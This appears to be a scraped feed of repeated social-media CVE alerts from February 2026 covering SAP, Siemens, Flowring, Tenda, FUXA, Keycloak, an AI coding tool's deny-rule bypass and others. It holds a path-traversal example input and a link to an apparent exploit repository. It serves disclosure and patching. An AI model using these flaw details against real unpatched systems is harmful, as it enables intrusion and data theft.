A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23718/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:28
2 posts
🟠 CVE-2026-23716 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23716 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:27
2 posts
🟠 CVE-2025-40587 - High (7.6)
A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40587/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-40587 - High (7.6)
A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40587/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:27
2 posts
🟠 CVE-2026-23715 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23715/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23715 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23715/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
3 posts
🚨 CVE-2026-2095: CRITICAL auth bypass in all Flowring Agentflow versions. Remote attackers can impersonate any user — no patch available. Restrict access & monitor for abnormal logins. https://radar.offseq.com/threat/cve-2026-2095-cwe-288-authentication-bypass-using--1f37d3de #OffSeq #Cybersecurity #Vulnerability #Agentflow
##🔴 CVE-2026-2095 - Critical (9.8)
Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2095/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2095 - Critical (9.8)
Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2095/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
4 posts
🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
6 posts
🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:27
2 posts
🔴 CVE-2025-11242 - Critical (9.8)
Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-11242/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-11242 - Critical (9.8)
Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-11242/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:44
2 posts
🟠 CVE-2026-23689 - High (7.7)
Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23689 - High (7.7)
Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:40
2 posts
🟠 CVE-2025-11547 - High (7.8)
AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-11547/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-11547 - High (7.8)
AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-11547/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:39
7 posts
3674774 - [CVE-2026-0509] Missing Authorization check in SAP NetWeaver Application Server #ABAP and ABAP Platform
https://me.sap.com/notes/3674774
🛡️ CRITICAL: CVE-2026-0509 in SAP NetWeaver ABAP (7.22 – 9.19) lets authenticated users run unauthorized background RFCs, risking integrity & availability. Patch when available, restrict S_RFC, monitor RFC usage. Details: https://radar.offseq.com/threat/cve-2026-0509-cwe-862-missing-authorization-in-sap-3bdb181d #OffSeq #SAP #CVE20260509 #infosec
##🔴 CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🛡️ CRITICAL: CVE-2026-0509 in SAP NetWeaver ABAP (7.22 – 9.19) lets authenticated users run unauthorized background RFCs, risking integrity & availability. Patch when available, restrict S_RFC, monitor RFC usage. Details: https://radar.offseq.com/threat/cve-2026-0509-cwe-862-missing-authorization-in-sap-3bdb181d #OffSeq #SAP #CVE20260509 #infosec
##🔴 CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:39
2 posts
🟠 CVE-2026-0490 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a h...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-0490 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a h...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:38
3 posts
🔥 CVE-2026-0488 (CVSS 9.9): CRITICAL auth bypass in SAP CRM & S/4HANA Scripting Editor. Authenticated users can run arbitrary SQL, risking full DB compromise. Patch fast, restrict access! https://radar.offseq.com/threat/cve-2026-0488-cwe-862-missing-authorization-in-sap-cae5a650 #OffSeq #SAP #Vuln #ERP #Cybersecurity
##🔴 CVE-2026-0488 - Critical (9.9)
An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. Thi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0488/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-0488 - Critical (9.9)
An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. Thi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0488/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:38
2 posts
🟠 CVE-2026-0485 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker co...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0485/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-0485 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker co...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0485/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:57:34
1 posts
🟠 CVE-2026-25958 - High (7.7)
Cube is a semantic layer for building data applications. From 0.27.19 to before 1.5.13, 1.4.2, and 1.0.14, it is possible to make a specially crafted request with a valid API token that leads to privilege escalation. This vulnerability is fixed in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25958/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:56:59
1 posts
1 repos
https://github.com/mbanyamer/CVE-2026-25939-SCADA-FUXA-Unauthenticated-Remote-Arbitrary
🔔 CVE-2026-25939: CRITICAL auth bypass in frangoteam FUXA (<1.2.11). Unauthenticated attackers can modify schedulers — risking ICS/SCADA disruption. Patch to 1.2.11+ now! https://radar.offseq.com/threat/cve-2026-25939-cwe-862-missing-authorization-in-fr-75e34d8a #OffSeq #ICS #Vulnerability #SCADA
##updated 2026-02-10T02:56:49
1 posts
⚠️ CRITICAL: CVE-2026-25894 in frangoteam FUXA (<1.2.10) lets unauthenticated attackers forge admin JWT tokens & execute code. Patch to 1.2.10+, audit secrets, restrict access. Protect your ICS! https://radar.offseq.com/threat/cve-2026-25894-cwe-321-use-of-hard-coded-cryptogra-a10e5fe5 #OffSeq #ICS #Vulnerability #SCADA
##updated 2026-02-10T02:56:39
1 posts
🟠 CVE-2026-25890 - High (8.1)
File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, an authenticated user can bypass the application's "Disallow" file path rules by mo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25890/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:56:34
1 posts
🔴 CVE-2026-25881 - Critical (9)
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global p...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25881/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:56:05
1 posts
🟠 CVE-2026-25892 - High (7.5)
Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint la...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25892/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:15:52.253000
1 posts
1 repos
🟠 CVE-2026-1529 - High (8.1)
A flaw was found in Keycloak. An attacker can exploit this vulnerability by modifying the organization ID and target email within a legitimate invitation token's JSON Web Token (JWT) payload. This lack of cryptographic signature verification allow...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1529/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T00:30:37
1 posts
🟠 CVE-2025-15319 - High (7.8)
Tanium addressed a local privilege escalation vulnerability in Endpoint Configuration Toolset Solution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15319/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T22:39:51
1 posts
🟠 CVE-2026-25791 - High (7.5)
Sliver is a command and control framework that uses a custom Wireguard netstack. Prior to 1.7.0, the DNS C2 listener accepts unauthenticated TOTP bootstrap messages and allocates server-side DNS sessions without validating OTP values, even when En...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25791/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T22:39:36
1 posts
🟠 CVE-2026-25639 - High (7.5)
Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25639/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T21:55:30.093000
1 posts
🟠 CVE-2026-25761 - High (8.8)
Super-linter is a combination of multiple linters to run as a GitHub Action or standalone. From 6.0.0 to 8.3.0, the Super-linter GitHub Action is vulnerable to command injection via crafted filenames. When this action is used in downstream GitHub ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25761/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T21:53:03.017000
1 posts
🟠 CVE-2025-69214 - High (8.8)
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attac...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69214/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:55.263000
2 posts
🔴 CVE-2026-25803 - Critical (9.8)
3DP-MANAGER is an inbound generator for 3x-ui. In version 2.0.1 and prior, the application automatically creates an administrative account with known default credentials (admin/admin) upon the first initialization. Attackers with network access to...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25803/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25803 - Critical (9.8)
3DP-MANAGER is an inbound generator for 3x-ui. In version 2.0.1 and prior, the application automatically creates an administrative account with known default credentials (admin/admin) upon the first initialization. Attackers with network access to...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25803/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:55.263000
1 posts
🟠 CVE-2026-2070 - High (8.8)
A vulnerability has been found in UTT 进取 520W 1.7.7-180627. The affected element is the function strcpy of the file /goform/formPolicyRouteConf. Such manipulation of the argument GroupName leads to buffer overflow. The attack can be executed r...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2070/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:55.263000
1 posts
🟠 CVE-2026-2068 - High (8.8)
A vulnerability was detected in UTT 进取 520W 1.7.7-180627. This issue affects the function strcpy of the file /goform/formSyslogConf. The manipulation of the argument ServerIp results in buffer overflow. The attack may be launched remotely. The...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2068/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
1 posts
🟠 CVE-2025-10465 - High (8.8)
Unrestricted Upload of File with Dangerous Type vulnerability in Birtech Information Technologies Industry and Trade Ltd. Co. Sensaway allows Upload a Web Shell to a Web Server.This issue affects Sensaway: through 09022026.
NOTE: The vendor was c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-10465/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
1 posts
🟠 CVE-2025-7799 - High (8.6)
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Zirve Information Technologies Inc. E-Taxpayer Accounting Website allows Reflected XSS.This issue affects e-Taxpayer Accounting Website: t...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7799/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
3 posts
🟠 CVE-2026-2236 - High (7.5)
C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2236/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2236 - High (7.5)
C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2236/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2236 - High (7.5)
C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2236/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
1 posts
🔴 CVE-2026-22903 - Critical (9.8)
An unauthenticated remote attacker can send a crafted HTTP request containing an overly long SESSIONID cookie. This can trigger a stack buffer overflow in the modified lighttpd server, causing it to crash and potentially enabling remote code execu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22903/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
1 posts
🟠 CVE-2026-0870 - High (7.8)
MacroHub developed by GIGABYTE has a Local Privilege Escalation vulnerability. Due to the MacroHub application launching external applications with improper privileges, allowing authenticated local attackers to execute arbitrary code with SYSTEM p...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0870/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
1 posts
🟠 CVE-2025-15100 - High (8.8)
The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.6.03. This is due to the plugin allowing a user to update arbitrary user meta through the 'jay_panel_ajax_update_profile' f...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15100/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
1 posts
🟠 CVE-2026-2086 - High (8.8)
A vulnerability was detected in UTT HiPER 810G up to 1.7.7-171114. Affected by this vulnerability is the function strcpy of the file /goform/formFireWall of the component Management Interface. The manipulation of the argument GroupName results in ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2086/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T15:30:37
1 posts
🟠 CVE-2025-59023 - High (8.2)
Crafted delegations or IP fragments can poison cached delegations in Recursor.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-59023/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T14:47:41.783000
1 posts
🟠 CVE-2026-25724 - High (7.5)
Claude Code is an agentic coding tool. Prior to version 2.1.7, Claude Code failed to strictly enforce deny rules configured in settings.json when accessing files through symbolic links. If a user explicitly denied Claude Code access to a file (suc...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25724/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T12:30:30
1 posts
🔴 CVE-2025-6830 - Critical (9.8)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xpoda Türkiye Information Technology Inc. Xpoda Studio allows SQL Injection.This issue affects Xpoda Studio: through 09022026. NOTE: The vendor...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T12:30:30
1 posts
🔴 CVE-2026-25848 - Critical (9.1)
In JetBrains Hub before 2025.3.119807 authentication bypass allowing administrative actions was possible
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25848/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T12:30:30
1 posts
🟠 CVE-2026-25847 - High (8.2)
In JetBrains PyCharm before 2025.3.2 a DOM-based XSS on Jupyter viewer page was possible
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25847/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T10:15:57.377000
1 posts
🔴 CVE-2026-1709 - Critical (9.4)
A flaw was found in Keylime. The Keylime registrar, since version 7.12.0, does not enforce client-side Transport Layer Security (TLS) authentication. This authentication bypass vulnerability allows unauthenticated clients with network access to pe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1709/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:28
3 posts
🔴 CVE-2026-2234 - Critical (9.1)
C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2234/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2234 - Critical (9.1)
C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2234/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2234 - Critical (9.1)
C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2234/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:28
1 posts
🔴 CVE-2026-22904 - Critical (9.8)
Improper length handling when parsing multiple cookie fields (including TRACKID) allows an unauthenticated remote attacker to send oversized cookie values and trigger a stack buffer overflow, resulting in a denial‑of‑service condition and poss...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22904/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:28
1 posts
🔴 CVE-2026-1868 - Critical (9.9)
GitLab has remediated a vulnerability in the Duo Workflow Service component of GitLab AI Gateway affecting all versions of the AI Gateway from 18.1.6, 18.2.6, 18.3.1 to 18.6.1, 18.7.0, and 18.8.0 in which AI Gateway was vulnerable to insecure temp...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1868/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:27
2 posts
🟠 CVE-2026-22905 - High (7.5)
An unauthenticated remote attacker can bypass authentication by exploiting insufficient URI validation and using path traversal sequences (e.g., /js/../cgi-bin/post.cgi), gaining unauthorized access to protected CGI endpoints and configuration dow...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22905/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-22905 - High (7.5)
An unauthenticated remote attacker can bypass authentication by exploiting insufficient URI validation and using path traversal sequences (e.g., /js/../cgi-bin/post.cgi), gaining unauthorized access to protected CGI endpoints and configuration dow...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22905/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:27
1 posts
🔴 CVE-2026-22906 - Critical (9.8)
User credentials are stored using AES‑ECB encryption with a hardcoded key. An unauthenticated remote attacker obtaining the configuration file can decrypt and recover plaintext usernames and passwords, especially when combined with the authentic...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22906/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T06:30:37
1 posts
🔴 CVE-2026-1615 - Critical (9.8)
All versions of the package jsonpath are vulnerable to Arbitrary Code Injection via unsafe evaluation of user-supplied JSON Path expressions. The library relies on the static-eval module to process JSON Path input, which is not designed to handle ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1615/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-08T21:30:29
1 posts
🟠 CVE-2026-2186 - High (8.8)
A vulnerability has been found in Tenda RX3 16.03.13.11. Impacted is the function fromSetIpMacBind of the file /goform/SetIpMacBind. Such manipulation of the argument list leads to stack-based buffer overflow. The attack may be performed from remo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2186/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-08T21:30:29
1 posts
1 repos
🟠 CVE-2026-2187 - High (8.8)
A vulnerability was found in Tenda RX3 16.03.13.11. The affected element is the function set_qosMib_list of the file /goform/formSetQosBand. Performing a manipulation of the argument list results in stack-based buffer overflow. It is possible to i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2187/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-08T21:30:29
1 posts
🟠 CVE-2026-2181 - High (8.8)
